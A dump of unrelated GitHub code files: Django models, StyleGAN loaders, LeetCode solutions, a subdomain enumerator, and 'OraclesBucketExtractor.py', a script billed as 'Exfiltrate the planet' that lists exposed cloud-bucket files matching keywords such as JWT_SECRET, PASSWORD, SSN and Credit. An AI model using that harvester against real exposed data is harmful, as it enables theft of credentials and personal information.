prediction')\nplt.title('Daily pollution prediction vs real pollution')\nplt.legend()\nplt.show()","repo_name":"ARokni/Neural-Network-","sub_path":"Project 2/Codes/Part2_Simulation_with_Imputed_Data.py","file_name":"Part2_Simulation_with_Imputed_Data.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30060748963","text":"import requests\r\n\r\nprint(\"\"\"\r\n.___________. 
__ __ _______ ______ .______ ___ ______ __ _______ \r\n| || | | | | ____| / __ \\ | _ \\ / \\ / || | | ____|\r\n`---| |----`| |__| | | |__ | | | | | |_) | / ^ \\ | ,----'| | | |__ \r\n | | | __ | | __| | | | | | / / /_\\ \\ | | | | | __| \r\n | | | | | | | |____ | `--' | | |\\ \\----./ _____ \\ | `----.| `----.| |____ \r\n |__| |__| |__| |_______| \\______/ | _| `._____/__/ \\__\\ \\______||_______||_______|\r\n\"\"\")\r\nprint(\"Oracle's Bucket Extractor\")\r\nprint(\"Exfiltrate the planet. :)\")\r\nprint(\"file_paths.txt contains all the file paths, enjoy the data!\")\r\n\r\n#keywords = [\"JWT_SECRET\", \"MONGO_PASSWORD\", \"PASSWORD\", \"DB_\", \"PRIVATE\", \"KEY\", \"API_KEY\", \"api-key\", \"Card UID\", \"Total Sales\", \"SSN\", \"Credit\"]\r\n#urlextensions = txt,xls,csv,db,sql,yaml,env,tftstate,cs,php\r\n#extensions = [\"xls\", \"db\", \"sql\", \"yaml\", \"env\", \"tfstate\"]\r\n\r\nkeywords = [\"db_\", \"config\"]\r\nurlextensions = \"php\"\r\nexcludekeywords = \"-test\" #Make sure you have a minus, if you don't want anything, just do !\r\nextensions = [\"xls\"]\r\naccess_token = \"\" #Input your access token.\r\ndoKeyword = False\r\ndoExtension = True\r\npaths = []\r\n# Set up the API endpoint and parameters\r\n\r\nif doKeyword:\r\n for keyword in keywords:\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{keyword}{excludekeywords}/0/1000?extensions={urlextensions}&access_token={access_token}\"\r\n response = requests.get(endpoint)\r\n data = response.json()\r\n num_results = data[\"results\"]\r\n print(f\"[+] Extracting \" + str(num_results) + f\" Of Entries for [{keyword}].\")\r\n num_pages = num_results // 1000\r\n\r\n for i in range(1, num_pages + 1):\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{keyword}{excludekeywords}/{i*1000}/1000?extensions={urlextensions}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n #print(response.request.url)\r\n data = response.json()\r\n #print(data)\r\n for file in data[\"files\"]:\r\n domain_name = file[\"url\"]\r\n full_path = file[\"fullPath\"]\r\n #file_data = requests.get(f\"{domain_name}{full_path}\")\r\n #open(f\"{full_path.split('/')[-1]}\", \"wb\").write(file_data.content)\r\n paths.append((domain_name, full_path))\r\n # Write the domain_name and full_path to a .txt file\r\n with open(\"file_paths.txt\", \"a\") as f:\r\n for path in paths:\r\n f.write(f\"{path[0]}{path[1]}\\n\")\r\n # Clear the list to avoid buffer issues\r\n paths = []\r\n\r\nif doExtension:\r\n for extension in extensions:\r\n print(\"[+] Extracting Extensions now.\")\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{excludekeywords}/0/1000?extensions={extension}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n #print(response.request.url)\r\n data = response.json()\r\n num_results = data[\"results\"]\r\n print(f\"[+] Extracting \" + str(num_results) + f\" Of Entries for [{extension}].\")\r\n num_pages = num_results // 1000\r\n\r\n for i in range(1, num_pages + 1):\r\n endpoint = f\"https://buckets.grayhatwarfare.com/api/v1/files/{excludekeywords}/{i*1000}/1000?extensions={extension}&access_token={access_token}\"\r\n response = requests.get(endpoint, verify=True)\r\n data = response.json()\r\n for file in data[\"files\"]:\r\n domain_name = file[\"url\"]\r\n full_path = file[\"fullPath\"]\r\n paths.append((domain_name, full_path))\r\n with open(\"ext_paths.txt\", \"a\") as f:\r\n for path in paths:\r\n f.write(f\"{path[0]}{path[1]}\\n\")\r\n # 
Clear the list to avoid buffer issues\r\n paths = []\r\n","repo_name":"Oracle-Security/PublicBucketExtractor","sub_path":"OraclesBucketExtractor.py","file_name":"OraclesBucketExtractor.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"26089770835","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n n1 = len(word1)\n n2 = len(word2)\n pt1 = 0\n pt2 = 0\n ans = ''\n while pt1 < n1 and pt2 < n2:\n ans += word1[pt1]\n ans += word2[pt2]\n pt1 += 1\n pt2 += 1\n while pt1 < n1:\n ans += word1[pt1]\n pt1 += 1\n while pt2 < n2:\n ans += word2[pt2]\n pt2 += 1\n return ans","repo_name":"Rediet-Ferew/competitive-programming","sub_path":"1768-merge-strings-alternately/1768-merge-strings-alternately.py","file_name":"1768-merge-strings-alternately.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6671465278","text":"import colorama\nfrom colorama import Fore, Back, Style\nimport sys\n\nDEBUG = 1 #set to 1 to enable debug mode, set to 0 to turn off debug mode\n\nERROR = \"[ \" + Fore.RED + \"ERROR\" + Fore.WHITE + \" ] : \"\nSUCCESS = \"[ \" + Fore.GREEN + \"SUCCESS\" + Fore.WHITE + \" ] : \"\nRUNNING = \"[ \" + Fore.GREEN + \"RUNNING\" + Fore.WHITE + \" ] : \"\nWARNING = \"[ \" + Fore.YELLOW + \"WARNING\" + Fore.WHITE + \" ] : \"\n\ndef versioning():\n if('2.7.' not in sys.version):\n print(ERROR + 'Python version 2.7.xx required')\n return False\n\n if('0.3.' not in colorama.__version__):\n print(WARNING + 'install/upgrade colorama for aesthetic appeal')\n\n print(SUCCESS + 'crypto-backtest loaded')\n return True\n\nif(not versioning()):\n quit()\n\ncolorama.init()\n","repo_name":"patrickgrad/crypto-backtest","sub_path":"cb_statuses.py","file_name":"cb_statuses.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74011731075","text":"\nimport calendar\nimport datetime\nimport logging\nimport math\nimport pytz\nimport sys\nimport time\n\nlogger = logging.getLogger(__name__)\n\n##############################################################################################################\n\nclass tzoffset(datetime.tzinfo):\n\n def __init__(self, offset=0):\n self._offset = datetime.timedelta(seconds=offset)\n self._name = None # fixed-offset zone; no symbolic name configured\n \n def utcoffset(self, dt):\n return self._offset\n\n def dst(self, dt):\n #return self._dstoffset\n return datetime.timedelta(0)\n\n def tzname(self, dt):\n return self._name\n\n##############################################################################################################\n\ndef getText(doc, tag):\n nodes = doc.getElementsByTagName(tag)\n if len(nodes) < 1:\n return \"\"\n if nodes[0].firstChild == None:\n return \"\"\n if nodes[0].firstChild.data == None:\n return \"\"\n return nodes[0].firstChild.data\n\ndef strToNaiveDateTime(dateTime):\n if dateTime == \"\":\n return None\n # 2009-06-04T17:44:02Z\n return datetime.datetime.strptime(dateTime,\"%Y-%m-%dT%H:%M:%SZ\")\n\ndef epochToNaiveDateTime(epoch):\n if epoch is None or epoch <= 0:\n return None\n dt = datetime.datetime.utcfromtimestamp(epoch)\n #print(\"%d -> %s\" % (epoch,dt))\n return dt\n\ndef strToDateTime(dateTime):\n if dateTime == \"\":\n return None\n # 2009-06-04T17:44:02Z\n dateTime = dateTime[:len(dateTime)-1]+\" UTC\"\n return 
datetime.datetime.strptime(dateTime,\"%Y-%m-%dT%H:%M:%S %Z\").replace(tzinfo=tzoffset(0))\n\ndef epochToDateTime(epoch, tz=tzoffset(0)):\n if epoch is None or epoch <= 0:\n return None\n return datetime.datetime.fromtimestamp(epoch,tz)\n\ndef dateTimeToEpoch(dt):\n if dt is None:\n return None\n if dt.utcoffset():\n print(\" offset is %s\" % dt.utcoffset())\n udt = dt - dt.utcoffset()\n else:\n udt = dt\n return time.mktime(udt.timetuple())\n\ndef hms(secs):\n hours = math.trunc(secs / (60*60))\n secs = secs - hours * 60*60\n mins = math.trunc(secs / 60)\n secs = int(secs - mins * 60)\n return \"%02d:%02d:%02d\" % (hours,mins,secs)\n\n##############################################################################################################\n\nif __name__ == \"__main__\":\n\n # 1372673894 -> 2013-07-01 10:18:14\n orig_epoch = 1372673894\n orig_dt_str = \"2013-07-01T10:18:14Z\"\n\n dt = datetime.datetime.strptime(orig_dt_str,\"%Y-%m-%dT%H:%M:%SZ\")\n print(orig_dt_str)\n print(dt)\n\n print(orig_epoch)\n print(calendar.timegm(dt.timetuple()))\n\n sys.exit(0)\n\n\n\n dt_str = \"2009-06-04T17:44:02Z\"\n print(dt_str)\n dt = strToDateTime(dt_str)\n print(dt.isoformat())\n epoch = dateTimeToEpoch(dt)\n print(epoch) # wrong\n print(int(dt.strftime(\"%s\")))\n dt2 = epochToDateTime(epoch)\n print(dt2.isoformat())\n\n print(\"--------\")\n dt = datetime.datetime.strptime(dt_str[:len(dt_str)-1],\"%Y-%m-%dT%H:%M:%S\")\n print(dt.isoformat())\n epoch = int(dt.strftime(\"%s\"))\n print(epoch)\n dt2 = datetime.datetime.fromtimestamp(epoch)\n print(dt2.isoformat())\n\n print(\"--------\")\n dt = datetime.datetime.strptime(dt_str[:len(dt_str)-1],\"%Y-%m-%dT%H:%M:%S\")\n print(dt.isoformat())\n\n dt = dt.replace(tzinfo=pytz.UTC)\n print(dt.isoformat())\n\n epoch = int(dt.strftime(\"%s\"))\n print(epoch)\n\n dt2 = datetime.datetime.utcfromtimestamp(epoch)\n print(dt2.isoformat())\n","repo_name":"XSEDE/karnak_retired_source_20220729","sub_path":"karnak/python-normalized/lib/karnak/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71248176835","text":"#LC 58\ndef lola(s: str):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if s.strip() == \"\":\n return 0\n reversed = s[::-1].strip()\n for i in range(len(reversed)):\n if reversed[i] == \" \":\n return i\n return len(reversed) \n\n\n","repo_name":"Urus-Corsa/Data-Structures-Algorithms","sub_path":"Strings/lengthOfLastWord.py","file_name":"lengthOfLastWord.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10476187764","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'Attribute'\n db.create_table('OOExample_attribute', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('name', self.gf('django.db.models.fields.CharField')(max_length=60)),\n ))\n db.send_create_signal('OOExample', ['Attribute'])\n\n # Adding model 'Release'\n db.create_table('OOExample_release', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ))\n db.send_create_signal('OOExample', ['Release'])\n\n # Adding M2M table for field attrbutes on 'Release'\n db.create_table('OOExample_release_attrbutes', (\n ('id', 
models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('release', models.ForeignKey(orm['OOExample.release'], null=False)),\n ('attribute', models.ForeignKey(orm['OOExample.attribute'], null=False))\n ))\n db.create_unique('OOExample_release_attrbutes', ['release_id', 'attribute_id'])\n\n # Adding model 'Instance'\n db.create_table('OOExample_instance', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('release', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Release'])),\n ))\n db.send_create_signal('OOExample', ['Instance'])\n\n # Adding model 'InstanceAttribute'\n db.create_table('OOExample_instanceattribute', (\n ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('instance', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Instance'])),\n ('attribute', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['OOExample.Attribute'])),\n ('value', self.gf('django.db.models.fields.CharField')(max_length=60)),\n ))\n db.send_create_signal('OOExample', ['InstanceAttribute'])\n\n\n def backwards(self, orm):\n # Deleting model 'Attribute'\n db.delete_table('OOExample_attribute')\n\n # Deleting model 'Release'\n db.delete_table('OOExample_release')\n\n # Removing M2M table for field attrbutes on 'Release'\n db.delete_table('OOExample_release_attrbutes')\n\n # Deleting model 'Instance'\n db.delete_table('OOExample_instance')\n\n # Deleting model 'InstanceAttribute'\n db.delete_table('OOExample_instanceattribute')\n\n\n models = {\n 'OOExample.attribute': {\n 'Meta': {'object_name': 'Attribute'},\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'name': ('django.db.models.fields.CharField', [], {'max_length': '60'})\n },\n 'OOExample.instance': {\n 'Meta': {'object_name': 'Instance'},\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'release': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Release']\"})\n },\n 'OOExample.instanceattribute': {\n 'Meta': {'object_name': 'InstanceAttribute'},\n 'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Attribute']\"}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'instance': ('django.db.models.fields.related.ForeignKey', [], {'to': \"orm['OOExample.Instance']\"}),\n 'value': ('django.db.models.fields.CharField', [], {'max_length': '60'})\n },\n 'OOExample.release': {\n 'Meta': {'object_name': 'Release'},\n 'attrbutes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': \"orm['OOExample.Attribute']\", 'null': 'True', 'blank': 'True'}),\n 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})\n }\n }\n\n complete_apps = ['OOExample']","repo_name":"Adnn/Collecster_OLD","sub_path":"OOExample/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31238764527","text":"#!/usr/bin/env python\n\nimport sys , requests , socket , re , argparse \nimport urllib.parse as urlparse\nfrom os import path\n\nquiet = False\nverbose = False\nip = False\napi_key = \"\"\nListFile = \"\"\noutFile = \"\" \nports = \"\"\ndomain = \"\"\nwordlist = \"\"\nEmails = []\nDomains = []\nmark = '[+] '\n\ndef StartUp():\n global quiet\n global api_key \n global verbose\n global ip\n global domain\n global 
outFile\n    global wordlist\n    global ListFile\n    global ports\n    \n    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,epilog='Example: python ' + sys.argv[0] + \" -d google.com -o out.txt\" + '\\n\\n---SubBuster v0.4---\\nCreated By: @shoamshilo 2020 ',\n    description='''SubBuster is a sub-domain discovery tool that uses a custom made wordlist to detect sub-domains.\\nThis tool can assist penetration testers or OSINT investigators in determining a corporation's sub-domains.\\nIt allows for both active and passive scanning of a domain.''')\n    parser._optionals.title = \"OPTIONS\"\n    parser.add_argument('-d' , action='store', dest='domain' , help='Specify the base domain.')\n    parser.add_argument('-w' , action='store', dest='wordlist' , help=\"Path to the wordlist. If the flag is not set SubBuster will use its wordlist.\")\n    parser.add_argument('-q', action='store_true', default=False, dest='quiet' , help='Toggle quiet mode.')\n    parser.add_argument('-o' , action='store', dest='outFile', help='Specify an output file.')\n    parser.add_argument('-f' , action='store', dest='ListFile' ,help='Specify a list of domains.')\n    parser.add_argument('-p' , action='store', dest='ports' , help='Specify a port 80 or 443.')\n    parser.add_argument('-v' , action='store_true', default=False, dest='verbose' , help='Verbose output.')\n    parser.add_argument('-E' , action='store', dest='api_key' , help='Toggle email searching with hunter.io. Requires an API key.')\n    parser.add_argument('-I' , action='store_true', default=False, dest='ip' , help='Toggle hostname IP resolve')\n    parser.add_argument('--version', action='version', version='SubBuster v0.4')\n\n    args = parser.parse_args()\n\n    quiet = args.quiet\n    verbose = args.verbose\n    ip = args.ip\n    api_key = args.api_key\n    ListFile = args.ListFile\n    outFile = args.outFile \n    ports = args.ports\n    domain = args.domain\n    wordlist = args.wordlist\n\ndef BrutForce():\n    global Domains\n    if ErrorCheck():\n        print(mark + \"Searching Sub Domains\")\n        with open(wordlist) as File:\n            line = File.readline()\n            while line:\n                http = f\"http://{line.strip()}.{domain}\"\n                https = f\"https://{line.strip()}.{domain}\"\n                if ports:\n                    port = Ports()\n                    if '80' in port:\n                        if url_check(http) and not inDomains(http):\n                            Domains.append(http)\n                    # only probe https when port 443 was actually requested\n                    if '443' in port:\n                        if url_check(https) and not inDomains(https):\n                            Domains.append(https)\n                else:\n                    if url_check(http) and not inDomains(http):\n                        Domains.append(http)\n                if verbose and Domains:\n                    print(mark + Domains[len(Domains)-1]) \n                line = File.readline() \n\ndef qBruteForce():\n    page_no = 100\n    baseurl = f\"https://google.com/search?q={domain}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0\"\n    resp = requests.get(baseurl)\n    extractdomains(responsehandler(resp))\n\ndef extractdomains(resp):\n    global Domains\n    links = []\n    regex = re.compile(r'(?:(?:https?|ftp):\\/\\/)?[\\w/\\-?=%.]+\\.[\\w/\\-&?=%.]+')\n    try:\n        links = regex.findall(resp)\n        for link in links:\n            if link.startswith('http'):\n                link = 'https://' + urlparse.urlparse(link).netloc\n            if link.endswith(domain) and not inDomains(link):\n                Domains.append(link)\n                if verbose:\n                    print(mark + link)\n    except Exception:\n        pass\n\ndef responsehandler(response):\n    if response is None:\n        return 0\n    return response.text if hasattr(response, \"text\") else response.connect\n\ndef inDomains(domain):\n    for url in Domains:\n        if url == domain:\n            return True\n    return False\n\ndef listFile():\n    global domain\n    try:\n        with open(ListFile, 'r') as 
listfile:\n            domain = listfile.readline().strip()\n            while domain:\n                print(mark + f\"Busting {domain}:\")\n                if quiet:\n                    qBruteForce()\n                else:\n                    BrutForce()\n                domain = listfile.readline().strip()\n    except FileNotFoundError:\n        print(mark + \"\"\"There is an error with your domain file. \n                            It is either not found or it doesn't exist.\"\"\")\n        sys.exit()\n\ndef url_check(url):\n    try:\n        r = requests.get(url)\n        if r.status_code:\n            return True\n        return False\n    except Exception:\n        return False\n\ndef Ports():\n    return ports.split(',')\n\ndef ip_resolve():\n    i=0\n    for url in Domains:\n        s = url.split('/')\n        url = f\"{url} : {socket.gethostbyname(s[2])}\"\n        Domains[i] = url\n        i+=1\n\ndef hunter():\n    global Emails\n    url = f\"https://api.hunter.io/v2/domain-search?domain={domain}&api_key={api_key}\"\n    r = requests.get(url)\n    response = r.json()\n    for email in response['data']['emails']:\n        Emails.append(\"Email: \" + str(email['value']))\n\ndef printDomains():\n    if ip:\n        ip_resolve()\n    print(mark + f\"Found {str(len(Domains))} sub-domains:\")\n    for url in Domains:\n        print(mark + url)\n    for email in Emails:\n        print(mark + email)\n\ndef OutPut():\n    with open(outFile , 'w') as out:\n        for url in Domains:\n            out.write(url + '\\n')\n        if Emails:\n            out.write('Emails for the domain' + '\\n')\n            for email in Emails:\n                out.write(email + '\\n')\n\ndef ErrorCheck():\n    global wordlist\n    if not wordlist:\n        print(mark + \"You haven't specified a wordlist. Using SubBuster's wordlist.\")\n        wordlist = \"wordlist.txt\"\n    if not path.exists(wordlist):\n        print(mark + \"\"\"There is an error with your wordlist. \n                            It is either not found or it doesn't exist.\"\"\")\n        sys.exit() \n    if not domain:\n        if ListFile:\n            return True\n        print(mark + \"You haven't specified a domain.\")\n        sys.exit()\n    return True\n    \nif __name__ == '__main__':\n    StartUp()\n    # a domain list takes precedence; otherwise scan the single -d domain\n    if ListFile:\n        listFile()\n    elif quiet:\n        qBruteForce()\n    else:\n        BrutForce()\n    if api_key:\n        hunter()\n    printDomains()\n    if outFile:\n        OutPut()","repo_name":"shoamshilo/SubBuster","sub_path":"SubBuster.py","file_name":"SubBuster.py","file_ext":"py","file_size_in_byte":6821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14490872943","text":"import tensorflow as tf\n\n\ndef load_generator(g_params=None, is_g_clone=False, ckpt_dir=None, custom_cuda=True):\n    if custom_cuda:\n        from stylegan2.generator import Generator\n    else:\n        from stylegan2_ref.generator import Generator\n\n    if g_params is None:\n        g_params = {\n            'z_dim': 512,\n            'w_dim': 512,\n            'labels_dim': 0,\n            'n_mapping': 8,\n            'resolutions': [4, 8, 16, 32, 64, 128, 256, 512, 1024],\n            'featuremaps': [512, 512, 512, 512, 512, 256, 128, 64, 32],\n        }\n\n    test_latent = tf.ones((1, g_params['z_dim']), dtype=tf.float32)\n    test_labels = tf.ones((1, g_params['labels_dim']), dtype=tf.float32)\n\n    # build generator model\n    generator = Generator(g_params)\n    _ = generator([test_latent, test_labels])\n\n    if ckpt_dir is not None:\n        if is_g_clone:\n            ckpt = tf.train.Checkpoint(g_clone=generator)\n        else:\n            ckpt = tf.train.Checkpoint(generator=generator)\n        manager = tf.train.CheckpointManager(ckpt, ckpt_dir, max_to_keep=1)\n        ckpt.restore(manager.latest_checkpoint).expect_partial()\n        if manager.latest_checkpoint:\n            print(f'Generator restored from {manager.latest_checkpoint}')\n    return generator\n\n\ndef load_discriminator(d_params=None, ckpt_dir=None, custom_cuda=True):\n    if custom_cuda:\n        from stylegan2.discriminator import Discriminator\n    else:\n        from stylegan2_ref.discriminator import Discriminator\n\n    if d_params 
is None:\n        d_params = {\n            'labels_dim': 0,\n            'resolutions': [4, 8, 16, 32, 64, 128, 256, 512, 1024],\n            'featuremaps': [512, 512, 512, 512, 512, 256, 128, 64, 32],\n        }\n\n    res = d_params['resolutions'][-1]\n    test_images = tf.ones((1, 3, res, res), dtype=tf.float32)\n    test_labels = tf.ones((1, d_params['labels_dim']), dtype=tf.float32)\n\n    # build discriminator model\n    discriminator = Discriminator(d_params)\n    _ = discriminator([test_images, test_labels])\n\n    if ckpt_dir is not None:\n        ckpt = tf.train.Checkpoint(discriminator=discriminator)\n        manager = tf.train.CheckpointManager(ckpt, ckpt_dir, max_to_keep=1)\n        ckpt.restore(manager.latest_checkpoint).expect_partial()\n        if manager.latest_checkpoint:\n            print('Discriminator restored from {}'.format(manager.latest_checkpoint))\n    return discriminator\n","repo_name":"moono/stylegan2-tf-2.x","sub_path":"load_models.py","file_name":"load_models.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"61"} +{"seq_id":"6582896900","text":"from django.utils import timezone\nfrom django.db import models\nfrom django.urls import reverse\nfrom core.models import AbstractTimeStamped\nfrom django_countries.fields import CountryField\nfrom cal import Calendar\n\n\n# Create your models here.\nclass AbstractItem(AbstractTimeStamped):\n    \"\"\" Abstract model of Item \"\"\"\n\n    name = models.CharField(max_length=80)\n\n    class Meta:\n        abstract = True  # ':' made this an annotation, so the model was never marked abstract\n\n    def __str__(self):\n        return self.name\n\n\nclass RoomType(AbstractItem):\n    \"\"\" Room type objects \"\"\"\n\n    class Meta:\n        verbose_name = \"Room Type\"\n        ordering = [\"name\"]\n\n\nclass Amenity(AbstractItem):\n    \"\"\" Amenity objects \"\"\"\n\n    class Meta:\n        verbose_name_plural = \"Amenities\"\n\n\nclass Facility(AbstractItem):\n    \"\"\" Facility objects \"\"\"\n\n    class Meta:\n        verbose_name_plural = \"Facilities\"\n\n\nclass HouseRule(AbstractItem):\n    \"\"\" House rule objects \"\"\"\n\n    pass\n\n\nclass Photo(AbstractTimeStamped):\n    \"\"\" Photo model definition \"\"\"\n\n    caption = models.CharField(max_length=80)\n    image = models.ImageField(upload_to=\"room_photos\")\n    room = models.ForeignKey(\n        \"Room\", related_name=\"my_photos\", on_delete=models.CASCADE, blank=True\n    )\n\n    def __str__(self):\n        return self.caption\n\n\nclass Room(AbstractTimeStamped):\n    \"\"\" Rooms model definitions \"\"\"\n\n    name = models.CharField(max_length=140)\n    description = models.TextField()\n    country = CountryField()\n    city = models.CharField(max_length=80)\n    price = models.IntegerField()\n    address = models.CharField(max_length=140)\n\n    guests = models.IntegerField()\n    beds = models.IntegerField()\n    bedrooms = models.IntegerField()\n    baths = models.IntegerField()\n    check_in = models.TimeField()\n    check_out = models.TimeField()\n    instant_book = models.BooleanField(default=False)\n\n    def get_absolute_url(self):\n        return reverse(\"rooms:detail\", kwargs={\"pk\": self.pk})\n\n    host = models.ForeignKey(\n        \"users.User\", related_name=\"my_rooms\", on_delete=models.CASCADE\n    )\n    room_type = models.ForeignKey(\n        RoomType,\n        related_name=\"my_rooms\",\n        on_delete=models.SET_NULL,\n        null=True,\n        blank=True,\n    )\n    amenities = models.ManyToManyField(Amenity, related_name=\"my_rooms\", blank=True)\n    facilities = models.ManyToManyField(Facility, related_name=\"my_rooms\", blank=True)\n    house_rules = models.ManyToManyField(HouseRule, related_name=\"my_rooms\", blank=True)\n\n    def save(self, *args, **kwargs):\n        self.city = str.capitalize(self.city)\n        
super().save(*args, **kwargs) # Call the real save() method\n\n def first_image(self):\n (first,) = self.my_photos.all()[:1]\n return first.image.url\n\n def from_second_four_image(self):\n photos = self.my_photos.all()[1:5]\n return photos\n\n def get_ratings(self):\n reviews = self.my_reviews.all()\n avgs = 0.0\n\n if reviews.count() > 0:\n for r in reviews:\n avgs = avgs + r.rating_average()\n avgs = avgs / reviews.count()\n return round(avgs, 2)\n\n def sum_reviews(self):\n reviews = self.my_reviews.all()\n sums = {}\n sum_cleanliness = 0.0\n sum_location = 0.0\n sum_communication = 0.0\n sum_value = 0.0\n sum_check_in = 0.0\n sum_accuracy = 0.0\n\n if len(reviews) >0:\n count_of = len(reviews)\n for r in reviews:\n sum_cleanliness += r.cleanliness\n sum_location += r.location\n sum_communication += r.communication\n sum_value += r.value\n sum_check_in += r.check_in\n sum_accuracy += r.accuracy\n\n sums = {\n \"cleanliness\": ( round(sum_cleanliness/count_of,2), int((sum_cleanliness/ count_of/5.0)*100)),\n \"location\": (round(sum_location/count_of, 2), int((sum_location/ count_of / 5.0)*100)),\n \"communication\": (round(sum_communication/count_of, 2), int((sum_communication / count_of / 5.0)*100)),\n \"value\": (round(sum_value/count_of, 2), int((sum_value / count_of / 5.0)*100)),\n \"checkin\": (round(sum_check_in/count_of, 2), int((sum_check_in / count_of / 5.0)*100)),\n \"accuracy\": (round(sum_accuracy/count_of, 2), int((sum_accuracy / count_of / 5.0)*100)),\n }\n else:\n sums = {\n \"cleanliness\": (0.0, 0),\n \"location\": (0.0, 0),\n \"communication\": (0.0, 0),\n \"value\": (0.0, 0),\n \"checkin\": (0.0, 0),\n \"accuracy\": (0.0, 0),\n }\n return sums\n\n def get_this_and_next_months(self):\n now = timezone.now()\n year = now.year\n month = now.month\n next_month = month+1\n next_year = year\n\n if month == 12:\n next_month = 1\n next_year = year+1\n\n this_month_day = Calendar(year, month)\n next_month_day = Calendar(next_year, next_month)\n\n return [this_month_day, next_month_day]\n\n def __str__(self):\n return self.name\n","repo_name":"pleed0215/django_bnb","sub_path":"rooms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13629965276","text":"import argparse\nimport json\nimport os\nimport socketserver\nimport time\nfrom bisect import bisect_left\nfrom functools import reduce\nfrom pathlib import Path\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport engine.modules.utils as utils\n\n\ndef _analyze(text, is_query):\n response = utils.send_json({\n 'action': 'process',\n 'data': text,\n 'is_query': is_query\n }, NETWORK['text']['host'], NETWORK['text']['port'], True)\n return response['terms']\n\n\ndef _analyze_query(query):\n return _analyze(query, True)\n\n\ndef _analyze_document(document):\n return _analyze(document.read(), False)\n\n\nclass Vector:\n def __init__(self):\n self.path = ''\n self.freq = None\n self.w = None\n self.terms = None\n self.term_count = 0\n self.doc_count = 0\n self.doc_names = None\n self.last_query = {} # last query answered for each session\n\n def _build_index(self, freq, terms):\n index = [{'key': term, 'value': {'documents': []}} for term in terms]\n freq = np.array(freq.todense())\n\n it = np.nditer(freq, flags=['multi_index'])\n while not it.finished:\n f = int(it[0])\n 
i, j = it.multi_index\n if f:\n index[i]['value']['documents'].append({'document': self.doc_names[j], 'freq': f})\n it.iternext()\n\n utils.send_json({\n 'action': 'create',\n 'data': index\n }, NETWORK['indices']['host'], NETWORK['indices']['port'])\n\n def _calculate_freq(self):\n vectorizer = CountVectorizer(input='file', analyzer=_analyze_document)\n documents = []\n for doc in self.doc_names:\n path = os.path.join(self.path, doc + '.txt')\n documents.append(open(path))\n\n freq = vectorizer.fit_transform(documents).transpose()\n terms = vectorizer.get_feature_names()\n return freq, terms\n\n def _get_similarities(self, q):\n similarities = cosine_similarity(q, self.w.transpose()).tolist()[0]\n return similarities\n\n def build(self, path):\n self.path = path\n self.doc_names = [\n '.'.join(doc.name.split('.')[:-1])\n for doc in Path(self.path).iterdir() if doc.name.endswith('.txt')\n ]\n self.doc_names.sort()\n\n index = utils.send_json({\n 'action': 'load',\n 'path': path\n }, NETWORK['indices']['host'], NETWORK['indices']['port'], True)\n\n if not index:\n freq, terms = self._calculate_freq()\n self._build_index(freq, terms)\n else:\n freq, terms = utils.load_freq(index, self.doc_names)\n\n self.freq = freq\n self.w = TfidfTransformer().fit_transform(freq)\n self.terms = terms\n self.term_count = self.w.shape[0]\n self.doc_count = self.w.shape[1]\n\n def query(self, token, q, count, continuation=False):\n if count == -1:\n count = self.doc_count\n\n if isinstance(q, str):\n if continuation:\n q = self.last_query[token]\n else:\n vectorizer = 